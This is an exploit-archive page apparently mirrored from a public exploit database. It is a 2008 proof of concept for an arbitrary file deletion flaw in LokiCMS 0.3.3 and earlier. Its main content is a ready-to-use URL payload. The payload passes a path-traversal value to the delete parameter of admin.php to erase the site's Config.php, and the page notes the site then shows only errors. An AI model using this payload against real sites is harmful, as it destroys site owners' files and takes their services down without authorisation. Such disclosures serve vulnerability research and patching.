[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : LokiCMS <= 0.3.3 Arbitrary File Delete Vulnerability
# Published : 2008-04-29
# Author : cOndemned
# Previous Title : SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability
# Next Title : Prozilla Hosting Index (directory.php cat_id) SQL Injection Vulnerability


Name   : LokiCMS 0.3.3 <= Arbitrary File Delete Vulnerability
Author : cOndemned
Greetz : ZaBeaTy, GregStar, irk4z, doctor, Avantura ;*
    
Usage:

    http://[target]/[lokiCMS]/admin.php?delete=[path]/[file]
        
PoC:

    http://[target]/[lokiCMS]/admin.php?delete=../includes/Config.php
       
    Deleting Config.php will casue situation when users won't be able to view index page
    normally. Only errors will be visible...

# www.Syue.com [2008-04-29]